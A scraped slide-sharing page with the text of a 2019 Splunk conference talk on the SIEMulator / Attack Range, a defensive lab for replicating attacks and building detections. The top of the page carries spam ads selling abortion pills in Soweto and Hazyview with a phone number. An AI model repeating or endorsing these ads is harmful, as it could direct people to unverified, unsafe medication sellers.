%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 

SEC1671/ Attack range/Splunk SIEMulator splunkconf2019

  • 1. © 2019 SPLUNK INC. © 2019 SPLUNK INC. Rod Soto + Phil Royer Use Splunk SIEMulator to Generate Data for Automated, Detection, Investigation, and Response Splunk Security Research
  • 2. During the course of this presentation, we may make forward‐looking statements regarding future events or plans of the company. We caution you that such statements reflect our current expectations and estimates based on factors currently known to us and that actual events or results may differ materially. The forward-looking statements made in the this presentation are being made as of the time and date of its live presentation. If reviewed after its live presentation, it may not contain current or accurate information. We do not assume any obligation to update any forward‐looking statements made herein. In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only, and shall not be incorporated into any contract or other commitment. Splunk undertakes no obligation either to develop the features or functionalities described or to include any such feature or functionality in a future release. Splunk, Splunk>, Turn Data Into Doing, The Engine for Machine Data, Splunk Cloud, Splunk Light and SPL are trademarks and registered trademarks of Splunk Inc. in the United States and other countries. All other brand names, product names, or trademarks belong to their respective owners. © 2019 Splunk Inc. All rights reserved. Forward- Looking Statements © 2019 SPLUNK INC.
  • 3. © 2019 SPLUNK INC. Research Engineer Phil Royer Principal Security Researcher Rod Soto
  • 4. © 2019 SPLUNK INC. The Problem with a Lack of Data • Always catching up to the latest crimeware/exploit code • Exploit/Bug market has made it more difficult • Lack of a common data sharing framework • Data if any is divided in pieces (exploitation, detection, pcaps/logs,) • Most enterprises cannot afford a dedicated team of specialists to replicate/recreate specialized data
  • 5. © 2019 SPLUNK INC. Industry Limitations • No standard framework for sharing data • Market driven by keeping data proprietary or charging for it • Data shared into several pieces puzzle/jeopardy style • Replicating exploits is still seen as breaking the rules or out of many corporate defensive environments • There is no single framework that puts all the pieces together...
  • 6. © 2019 SPLUNK INC. Challenges in Data Replication ​Where does data come from? • 0days, Twitter, Disclosure lists, Exploit-Db, Industry reports, Security Groups, Internal Research, Github ​How do we replicate/measure? • Exploit-Db, Github, Adversarial Simulation (Caldera, FireDrill, RedCanary, Metasploit) ​How do we countermeasure? • Snort Signature, Splunk Searches (Investigation/Detection), Phantom Playbooks
  • 7. © 2019 SPLUNK INC. Enter Splunk SIEMulator • Project based on Chris Long’s Detection Lab (https://github.com/clong/DetectionLab) • Used to feed data into Splunk • Seeks to replicate attacks, generate data and countermeasures in a single framework • Infrastructure as Code allows continuous integration, quick deployment, cloud storage and elasticity
  • 8. © 2019 SPLUNK INC. SIEMulator IaC
  • 9. © 2019 SPLUNK INC. Attack Replication
  • 10. © 2019 SPLUNK INC. SIEMulator Architecture Overview Domain Controller Windows 10 AttackIQ FireDrill Simulated Attacks Splunk ES Phanto m Red Team Telemetry Forwarder Logs and Events Notable Events Investigation and Response Windows Target Infrastructure
  • 11. © 2019 SPLUNK INC. ​Example
  • 12. © 2019 SPLUNK INC. Attack Range Setup
  • 13. © 2019 SPLUNK INC. AttackIQ Web Interface (T1218/T1047)
  • 14. © 2019 SPLUNK INC. AttackIQ Web Interface (T1218/T1047)
  • 15. © 2019 SPLUNK INC. Attack Recorded in Splunk (T1218/T1047)
  • 16. © 2019 SPLUNK INC. Translating Data into the Defensive Context Splunk ES Detection Search T1218/T1047
  • 17. © 2019 SPLUNK INC. Applying This Data Splunk Alert
  • 18. © 2019 SPLUNK INC. Applying This Data - Investigation Searches
  • 19. © 2019 SPLUNK INC. Applying This Data - Investigation Searches
  • 21. © 2019 SPLUNK INC. Applying This Process • By applying this process we can cover the entire cycle of replicating known and new exploits, recording data applying Splunk technology for detection, investigation and defense. • We can now streamline the process of producing new content and tackle new threats in a faster mode. • We can now share this knowledge via content updates, publishing searches, playbooks, apps or modifying current content. • Future work will include integration with other Adversarial Simulation frameworks
  • 22. © 2019 SPLUNK INC. Content Production via ESCU
  • 23. © 2019 SPLUNK INC. The Security Research Team is devoted to delivering actionable intelligence to Splunk’s customers in an unceasing effort to safeguard them against modern enterprise risks. Composed of elite researchers, engineers, and consultants who have served in both public and private sector organizations, this innovative team of digital defenders monitors emerging cybercrime trends and techniques, then translates them into practical analytics that Splunk users can operationalize within their environments. Download Splunk Enterprise Security Content Update in Splunkbase to learn more. Splunk Security Research Team
  • 24. © 2019 SPLUNK INC. https://github.com/splunk/attack_range This is an underscore
  • 25. RATE THIS SESSION Go to the .conf19 mobile app to © 2019 SPLUNK INC. You ! Thank
  • 26. © 2019 SPLUNK INC. Q&A Rod Soto | Security Researcher Philip Royer | Security Researcher